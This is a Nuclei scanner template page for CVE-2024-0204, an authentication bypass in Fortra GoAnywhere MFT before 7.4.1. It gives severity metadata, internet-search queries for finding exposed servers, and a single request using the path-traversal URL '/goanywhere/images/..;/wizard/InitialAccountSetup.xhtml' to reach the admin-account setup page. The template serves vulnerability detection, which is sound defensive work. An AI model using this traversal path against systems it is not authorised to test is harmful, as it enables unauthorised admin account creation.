Fortra GoAnywhere MFT - Authentication Bypass
ID: CVE-2024-0204
Severity: critical
Author: DhiyaneshDK
Tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra
Description
Section titled “Description”Authentication bypass in Fortra’s GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
YAML Source
Section titled “YAML Source”id: CVE-2024-0204
info: name: Fortra GoAnywhere MFT - Authentication Bypass author: DhiyaneshDK severity: critical description: | Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. reference: - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml - https://www.fortra.com/security/advisory/fi-2024-001 - https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py - https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/ - http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0204 cwe-id: CWE-425 epss-score: 0.50096 epss-percentile: 0.97519 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer shodan-query: - http.favicon.hash:1484947000,1828756398,1170495932 - http.favicon.hash:1484947000 fofa-query: - app="GoAnywhere-MFT" - icon_hash=1484947000 - icon_hash=1484947000,1828756398,1170495932 - app="goanywhere-mft" zoomeye-query: app="Fortra GoAnywhere-MFT" tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra
http: - method: GET path: - "{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
matchers-condition: and matchers: - type: word part: body words: - "Create an administrator account" - "goanywhere" condition: and
- type: status status: - 200# digest: 4a0a0047304502207c20d0d4edb0724e11460833ccef63d24ced7dcfe5776826db15b5b511679668022100d6a69af36f96a9a6021b308eca630d691d33f72ce2cb8a3828f0f1f7640d47f3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-0204.yaml"